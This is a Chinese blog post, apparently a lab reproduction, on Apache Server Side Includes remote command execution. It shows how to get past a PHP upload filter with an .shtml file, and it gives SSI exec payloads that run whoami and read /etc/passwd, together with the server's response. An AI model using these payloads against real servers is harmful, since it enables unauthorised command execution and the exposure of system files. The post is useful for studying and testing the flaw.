前往小程序,Get更优阅读体验!
立即前往
首页
学习
活动
专区
工具
TVP
发布
社区首页 >专栏 >Apache SSI 远程命令执行漏洞复现

Apache SSI 远程命令执行漏洞复现

作者头像
渗透攻击红队
发布2019-11-19 15:02:21
2.6K0
发布2019-11-19 15:02:21
举报
文章被收录于专栏:漏洞知识库漏洞知识库

Apache SSI远程命令执行漏洞复现

SSI简介

SSI(服务器端包含)是放置在HTML页面中的指令,并在服务页面时在服务器上对其进行评估。它们使您可以将动态生成的内容添加到现有的HTML页面,而不必通过CGI程序或其他动态技术来提供整个页面。

例如,您可以将指令放置到现有的HTML页面中,例如:

代码语言:javascript
复制
<!--#echo var="DATE_LOCAL" -->

并且,当该页面被投放时,该片段将被评估并替换为其值:

代码语言:javascript
复制
Tuesday, 15-Jan-2013 19:28:54 EST

漏洞复现过程

这边是来到了一个上传点,我先上传一个php文件看看能不能上传:

Unsupported filetype uploaded.很明显,不能上传php!

那么我们就可以用SSI的特性来上传一个shtml文件

其中内容是:

代码语言:javascript
复制
<!--#exec cmd="whoami" -->

然后我们打开刚刚上传的cmd.stml:

Response返回:

代码语言:javascript
复制

HTTP/1.1 200 OK
Date: Wed, 16 Oct 2019 11:53:49 GMT
Server: Apache/2.4.25 (Debian)
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Length: 9
Connection: close
Content-Type: text/html

www-data

读取passwd文件

代码语言:javascript
复制
<!--#exec cmd="cat /etc/passwd" -->
本文参与 腾讯云自媒体分享计划,分享自微信公众号。
原始发表:2019-10-25,如有侵权请联系 cloudcommunity@tencent.com 删除

本文分享自 漏洞知识库 微信公众号,前往查看

如有侵权,请联系 cloudcommunity@tencent.com 删除。

本文参与 腾讯云自媒体分享计划  ,欢迎热爱写作的你一起参与!

评论
登录后参与评论
0 条评论
热度
最新
推荐阅读
目录
  • SSI简介
  • 漏洞复现过程
    • 读取passwd文件
    领券
    问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档